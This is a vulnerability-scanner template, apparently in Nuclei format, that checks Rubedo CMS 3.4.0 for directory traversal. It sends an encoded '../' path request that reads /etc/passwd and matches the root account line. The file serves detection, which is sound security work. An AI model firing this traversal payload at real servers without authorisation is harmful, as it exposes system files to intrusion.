id: rubedo-cms-directory-traversal info: name: Rubedo CMS 3.4.0 - Directory Traversal author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/45385 tags: rubedo,lfi requests: - method: GET path: - "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200